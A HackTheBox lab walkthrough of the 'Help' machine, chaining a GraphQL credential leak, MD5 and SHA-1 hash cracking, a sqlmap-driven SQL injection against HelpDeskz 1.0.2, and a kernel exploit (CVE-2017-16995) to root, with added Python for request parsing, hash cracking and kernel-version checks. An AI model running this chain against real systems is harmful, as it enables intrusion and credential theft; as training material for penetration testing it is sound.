HackTheBox - Help

Updated 29-03-2026

A Linux machine where a help desk application’s unauthenticated GraphQL endpoint exposes user credentials — and an authenticated SQL injection, combined with an older kernel vulnerability, escalates to root.

Recon

Nmap

$ ip=10.129.3.123; ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); nmap -p$ports -sC -sV $ip 
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-19 09:09 -0500
Nmap scan report for 10.129.3.123
Host is up (0.17s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://help.htb/
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.27 seconds

Findings:

  • 22/tcp: OpenSSH 7.2p2 (Ubuntu)
  • 80/tcp: Apache 2.4.18 redirecting to http://help.htb
  • 3000/tcp: Node.js Express server

Foothold

Hostname Setup

Add the vhost to /etc/hosts.

$ echo '10.129.3.123 help.htb' | sudo tee -a /etc/hosts

Visiting http://help.htb/ shows the default Apache2 page.

Directory Enumeration

Enumerate directories with ffuf.

$ ffuf -c -u http://help.htb/FUZZ -w /usr/share/dirb/wordlists/common.txt 

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://help.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/dirb/wordlists/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.hta [Status: 403, Size: 287, Words: 22, Lines: 12, Duration: 127ms]
.htaccess [Status: 403, Size: 292, Words: 22, Lines: 12, Duration: 8108ms]
.htpasswd [Status: 403, Size: 292, Words: 22, Lines: 12, Duration: 8110ms]
index.html [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 124ms]
[Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 133ms]
javascript [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 148ms]
server-status [Status: 403, Size: 296, Words: 22, Lines: 12, Duration: 147ms]
support [Status: 301, Size: 306, Words: 20, Lines: 10, Duration: 146ms]
:: Progress: [4614/4614] :: Job [1/1] :: 241 req/sec :: Duration: [0:00:19] :: Errors: 0 ::

ffuf discovers the /support directory, which is a HelpDeskz application. There is no obvious version information on the page, so we enumerate the /support directory further.

$ ffuf -c -u http://help.htb/support/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-small-files.txt

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://help.htb/support/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-files.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

LICENSE.txt [Status: 200, Size: 18092, Words: 3133, Lines: 340, Duration: 247ms]
favicon.ico [Status: 200, Size: 1150, Words: 5, Lines: 4, Duration: 162ms]
captcha.php [Status: 200, Size: 2873, Words: 14, Lines: 12, Duration: 132ms]
readme.html [Status: 200, Size: 7509, Words: 515, Lines: 154, Duration: 241ms]

We find readme.html, which shows the HelpDeskz version: 1.0.2.

Searching for known vulnerabilities in HelpDeskz 1.0.2, we find it is affected by:

  • Authenticated SQL Injection
  • Arbitrary File Upload

GraphQL Recon

Visiting http://help.htb:3000/ returns the following API response:

message	"Hi Shiv, To get access please find the credentials with given query"

After some additional investigation, we discover it is using GraphQL at http://help.htb:3000/graphql, which responds with GET query missing.

Trying http://help.htb:3000/graphql?query=dsa returns a syntax error, because GraphQL expects a structured query document (an operation with a selection set), not a bare string.

$ curl -s -G http://help.htb:3000/graphql --data-urlencode "query={user}" | jq  
{
"errors": [
{
"message": "Field \"user\" of type \"User\" must have a selection of subfields. Did you mean \"user { ... }\"?",
"locations": [
{
"line": 1,
"column": 2
}
]
}
]
}

$ curl -s -G http://help.htb:3000/graphql --data-urlencode "query={user {}}" | jq
{
"errors": [
{
"message": "Syntax Error GraphQL request (1:8) Expected Name, found }\n\n1: {user {}}\n ^\n",
"locations": [
{
"line": 1,
"column": 8
}
]
}
]
}

$ curl -s -G http://help.htb:3000/graphql --data-urlencode "query={user {username password}}" | jq
{
"data": {
"user": {
"username": "helpme@helpme.com",
"password": "5d3c93182bb20f07b994a7f617e99cff"
}
}
}

We are able to query and retrieve user credentials.

Hash Identification and Cracking

Identify the hash type using hash-identifier before attempting to crack it.

$ hash-identifier --help  
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------

Not Found.
--------------------------------------------------
HASH: 5d3c93182bb20f07b994a7f617e99cff

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

The hash is identified as MD5. Crack it with john:

$ john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
godhelpmeplz (?)
1g 0:00:00:00 DONE (2026-02-19 10:56) 3.846g/s 30145Kp/s 30145Kc/s 30145KC/s godiamond11213..godessisis
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

Now we have the credentials helpme@helpme.com:godhelpmeplz, and we can exploit CVE-2020-26546, the Authenticated SQL Injection.

SQL Injection via Ticket Attachment

Create a new ticket with an attachment. Then open the newly created ticket in the My Tickets tab.

Capture the attachment request in Burp and save it as req.txt:

$ cat req.txt 
GET /support/?v=view_tickets&action=ticket&param[]=7&param[]=attachment&param[]=2&param[]=9 HTTP/1.1
Host: help.htb
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://help.htb/support/?v=view_tickets&action=ticket&param[]=7
Accept-Encoding: gzip, deflate, br
Cookie: lang=english; PHPSESSID=0nl47eqa97kj42h0kms02o0ai5; usrhash=0Nwx5jIdx%2BP2QcbUIv9qck4Tk2feEu8Z0J7rPe0d70BtNMpqfrbvecJupGimitjg3JjP1UzkqYH6QdYSl1tVZNcjd4B7yFeh6KDrQQ%2FiYFsjV6wVnLIF%2FaNh6SC24eT5OqECJlQEv7G47Kd65yVLoZ06smnKha9AGF4yL2Ylo%2BEKbvyN8AcTUdaqjeJovHLY31HMiJ1SUhg7UALScKIZWw%3D%3D
Connection: keep-alive
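The saved request above is the raw format that sqlmap -r consumes: a request line, headers, a blank line, and an optional body. As an added example (not part of the original write-up or of sqlmap), the Python below parses such a file into its components and lists every query-string value that an injection test would be applied to. The embedded sample is constructed from the request shown above, with the PHPSESSID and usrhash cookie values replaced by placeholders; repeated keys such as param[] are kept as ordered lists so each occurrence can be addressed separately.

```python
"""Parse a raw HTTP request saved from Burp (the format sqlmap -r reads)
and list the places an injection test would be applied."""
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the attachment request from the write-up, with the
# session cookie values replaced by placeholders.
SAMPLE_REQUEST = (
    "GET /support/?v=view_tickets&action=ticket&param[]=7&param[]=attachment"
    "&param[]=2&param[]=9 HTTP/1.1\r\n"
    "Host: help.htb\r\n"
    "User-Agent: Mozilla/5.0 (constructed)\r\n"
    "Referer: http://help.htb/support/?v=view_tickets&action=ticket&param[]=7\r\n"
    "Cookie: lang=english; PHPSESSID=PLACEHOLDER_SESSION; usrhash=PLACEHOLDER_HASH\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)


def parse_raw_request(raw: str) -> dict:
    """Split a raw request into method, path, query parameters, headers,
    cookies and body. Repeated keys such as param[] become lists."""
    text = raw.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    lines = head.split("\n")
    method, target, version = lines[0].split(" ", 2)
    url = urlsplit(target)
    headers = {}
    for line in lines[1:]:
        # partition on the first colon only: header values (Referer) may contain colons
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    cookies = {}
    for part in headers.get("Cookie", "").split(";"):
        if "=" in part:
            name, _, value = part.strip().partition("=")
            cookies[name] = value
    return {
        "method": method,
        "version": version,
        "path": url.path,
        "query": parse_qs(url.query, keep_blank_values=True),
        "headers": headers,
        "cookies": cookies,
        "body": body,
    }


def injection_points(req: dict) -> list:
    """Every (parameter, position, value) triple in the query string.
    sqlmap tests each occurrence of a repeated key separately, which is
    why a PHP array parameter like param[] yields four candidates here."""
    points = []
    for name, values in req["query"].items():
        for index, value in enumerate(values):
            points.append((name, index, value))
    return points


if __name__ == "__main__":
    parsed = parse_raw_request(SAMPLE_REQUEST)
    print(parsed["method"], parsed["path"], parsed["query"])
    for point in injection_points(parsed):
        print(point)
```

Because the cookie header carries the HelpDeskz session (PHPSESSID and usrhash), the parsed request is also what makes the injection "authenticated": without those cookies the same URL would not reach the attachment code path.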

Use sqlmap to enumerate database names with --dbs:

$ sqlmap -r req.txt --dbs 

<-SNIP->

[11:26:17] [INFO] fetching number of databases
[11:26:17] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:26:17] [INFO] retrieved: 5
[11:26:20] [INFO] retrieved: information_schema
[11:27:01] [INFO] retrieved: mysql
[11:27:14] [INFO] retrieved: performance_schema
[11:27:56] [INFO] retrieved: support
[11:28:13] [INFO] retrieved: sys
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] support
[*] sys

[11:28:21] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/help.htb'

[*] ending @ 11:28:21 /2026-02-19/

List tables in the support database:

$ sqlmap -r req.txt -D support --tables

<-SNIP->

[19 tables]
+------------------------+
| articles |
| attachments |
| canned_response |
| custom_fields |
| departments |
| emails |
| error_log |
| file_types |
| knowledgebase_category |
| login_attempt |
| login_log |
| news |
| pages |
| priority |
| settings |
| staff |
| tickets |
| tickets_messages |
| users |
+------------------------+

[11:36:36] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/help.htb'

[*] ending @ 11:36:36 /2026-02-19/

Dump the staff table and crack any discovered hashes using a dictionary-based attack with rockyou.txt:

$ sqlmap -r req.txt -D support -T staff --dump              

<-SNIP->

[11:44:23] [INFO] retrieved: support@mysite.com
[11:44:52] [INFO] retrieved: Administrator
[11:45:14] [INFO] retrieved: 1
[11:45:15] [INFO] retrieved: 1543429746
[11:45:33] [INFO] retrieved: 1547216217
[11:45:50] [INFO] retrieved: 0
[11:45:53] [INFO] retrieved: d318f44739dced66793b1a603028133a76ae680e
[11:47:05] [INFO] retrieved: Best regards, Administrator
[11:48:00] [INFO] retrieved:

<-SNIP->

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N

do you want to crack them via a dictionary-based attack? [Y/n/q] Y

[11:54:19] [INFO] using hash method 'sha1_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> /usr/share/wordlists/rockyou.txt
[11:54:39] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]

[11:54:42] [INFO] starting dictionary-based cracking (sha1_generic_passwd)
[11:54:42] [INFO] starting 4 processes
[11:54:42] [INFO] cracked password 'Welcome1' for user 'admin'
Database: support
Table: staff
[1 entry]
+----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+
| id | email | login | avatar | admin | status | fullname | password | timezone | username | signature | department | last_login | newticket_notification |
+----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+
| 1 | support@mysite.com | 1547216217 | NULL | 1 | Enable | Administrator | d318f44739dced66793b1a603028133a76ae680e (Welcome1) | <blank> | admin | Best regards,\r\nAdministrator | a:1:{i:0;s:1:"1";} | 1543429746 | 0 |
+----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+

[11:54:45] [INFO] table 'support.staff' dumped to CSV file '/home/kali/.local/share/sqlmap/output/help.htb/dump/support/staff.csv'
[11:54:45] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/help.htb'

[*] ending @ 11:54:45 /2026-02-19/

We recover the credentials admin:Welcome1.
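Both credential recoveries in this write-up follow the same two steps: hash-identifier guesses the algorithm from the digest's length and character set (MD5 for the 32-character GraphQL hash, SHA-1 for the 40-character staff hash), then john or sqlmap hashes each wordlist entry and compares. As an added example that is not part of the write-up or of those tools, the Python below implements both steps with hashlib. The wordlist is a constructed stand-in for rockyou.txt (load_wordlist streams the real file if you have it); the two digests are the ones shown above; the length table only covers unsalted digests, which is why hash-identifier also lists MD4-based Domain Cached Credentials for 32 characters.

```python
"""Identify an unsalted hex digest by its length and run a dictionary
attack against it with Python's hashlib."""
import hashlib

# Digest length in hex characters -> algorithms that produce it. Length is
# only a heuristic: several unrelated schemes share the 32-character size.
CANDIDATES_BY_LENGTH = {
    32: ["md5"],
    40: ["sha1"],
    64: ["sha256"],
    128: ["sha512"],
}

# Constructed wordlist standing in for rockyou.txt.
WORDLIST = ["password", "Welcome1", "godhelpmeplz", "letmein", "admin"]

# The two digests recovered in the write-up (GraphQL user and HelpDeskz staff).
PAGE_HASHES = [
    "5d3c93182bb20f07b994a7f617e99cff",
    "d318f44739dced66793b1a603028133a76ae680e",
]


def identify(hash_hex: str) -> list:
    """Return candidate algorithm names for a hex digest, or [] if the
    string is not hex or has an unknown length."""
    h = hash_hex.strip().lower()
    if not h or any(c not in "0123456789abcdef" for c in h):
        return []
    return list(CANDIDATES_BY_LENGTH.get(len(h), []))


def digest_of(algorithm: str, word: str) -> str:
    """Hex digest of a word under a hashlib algorithm name."""
    return hashlib.new(algorithm, word.encode()).hexdigest()


def crack(hash_hex: str, wordlist, algorithms=None):
    """Return (algorithm, word) for the first wordlist entry whose digest
    matches under any candidate algorithm, or None. The wordlist is
    consumed once, so a streaming generator works as well as a list."""
    h = hash_hex.strip().lower()
    candidates = list(algorithms or identify(h))
    if not candidates:
        return None
    for word in wordlist:
        for algorithm in candidates:
            if digest_of(algorithm, word) == h:
                return algorithm, word
    return None


def load_wordlist(path: str):
    """Stream a wordlist file such as rockyou.txt line by line
    (rockyou.txt is not valid UTF-8 throughout, hence latin-1)."""
    with open(path, encoding="latin-1") as handle:
        for line in handle:
            yield line.rstrip("\n")


if __name__ == "__main__":
    for hash_hex in PAGE_HASHES:
        print(hash_hex, identify(hash_hex), crack(hash_hex, WORDLIST))
```

The defensive reading of the same code is the reason both accounts fell: unsalted MD5 and SHA-1 cost one hashlib call per guess, so any password in a public wordlist is recovered in seconds once the digest leaks through an endpoint such as the GraphQL API or a SQL injection.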

SSH Access

After trying likely usernames with the recovered password, we are able to log in over SSH as help:

$ ssh admin@help.htb                          
$ ssh support@help.htb
$ ssh staff@help.htb
$ ssh shiv@help.htb
$ ssh help@help.htb
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
help@help.htb's password:
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.4.0-116-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
You have new mail.
Last login: Fri Jan 11 06:18:50 2019
help@help:~$

Privilege Escalation

Kernel Info

Check the kernel version:

help@help:~$ cat /proc/version
Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018
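The /proc/version line is the input to the exploit research that follows, and the comparison against an advisory bound such as the "< 4.4.0-116" in the searchsploit title is the check a defender runs across an inventory. As an added example (not from the write-up), the Python below parses the Ubuntu kernel version into a numeric tuple and compares it against a bound; the sample string is constructed from the /proc/version output above, and the bound passed in the usage is taken from the exploit title only, not from any verified fixed version.

```python
"""Parse an Ubuntu kernel version string (as printed by /proc/version or
uname -r) into a comparable tuple and check it against an advisory bound."""
import re

# Constructed from the /proc/version line shown on the target.
PROC_VERSION = (
    "Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) "
    "(gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) "
    "#140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018"
)

# Ubuntu kernels are versioned upstream.major.minor.patch-ABI-flavour.
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)-(\d+)-([A-Za-z0-9]+)")


def parse_ubuntu_kernel(text: str):
    """Return ((major, minor, patch, abi), flavour) for the first Ubuntu
    kernel version found in text, e.g. ((4, 4, 0, 116), 'generic')."""
    match = VERSION_RE.search(text)
    if not match:
        raise ValueError("no Ubuntu kernel version in: %r" % text)
    major, minor, patch, abi, flavour = match.groups()
    return (int(major), int(minor), int(patch), int(abi)), flavour


def parse_bound(spec: str):
    """Parse a bound written like '4.4.0-116' into a comparable tuple."""
    major, minor, rest = spec.split(".", 2)
    patch, abi = rest.split("-", 1)
    return int(major), int(minor), int(patch), int(abi)


def at_or_below(running: str, bound: str) -> bool:
    """True when the running kernel is no newer than the bound. Tuple
    comparison treats the ABI number numerically, so 4.4.0-116 sorts
    below 4.4.0-1021, where a plain string comparison would not."""
    version, _ = parse_ubuntu_kernel(running)
    return version <= parse_bound(bound)


if __name__ == "__main__":
    print(parse_ubuntu_kernel(PROC_VERSION))
    print(at_or_below(PROC_VERSION, "4.4.0-116"))
```

CVE-2017-16995, the identifier searchsploit attaches to this exploit, is a bug in the kernel's eBPF verifier reachable through the unprivileged bpf() system call; where an affected kernel cannot be upgraded promptly, the sysctl kernel.unprivileged_bpf_disabled=1 removes that unprivileged entry point.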

Exploit Research

Using searchsploit, we identify a possible local privilege escalation exploit:

$ searchsploit 4.4.0-116        
------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Copy the exploit locally:

$ searchsploit -m linux/local/44298.c
Exploit: Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/44298
Path: /usr/share/exploitdb/exploits/linux/local/44298.c
Codes: CVE-2017-16995
Verified: False
File Type: C source, ASCII text
Copied to: /home/kali/htb/help/44298.c

Exploit Execution

Copy the exploit to the target:

$ scp 44298.c help@help.htb:/tmp
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
help@help.htb's password:
44298.c

Compile and execute it to obtain a root shell:

help@help:~$ cd /tmp
help@help:/tmp$ gcc 44298.c -o 44298
help@help:/tmp$ ./44298
task_struct = ffff88003b8d8000
uidptr = ffff88003703ef04
spawning root shell
root@help:/tmp#